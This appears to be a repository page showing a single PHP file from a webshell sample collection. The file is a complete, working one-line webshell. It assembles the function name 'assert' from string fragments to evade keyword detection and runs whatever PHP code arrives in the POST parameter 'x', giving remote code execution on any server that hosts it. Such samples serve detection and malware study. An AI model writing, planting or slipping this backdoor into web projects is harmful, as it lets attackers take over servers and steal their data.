webshell/php/2020.08.20.01.php

5 lines
76 B
PHP
Raw Normal View History

<?php
$a = substr('1a',1).'s'.'s'.'e'.'r'.'t';
$a($_POST['x']);
?>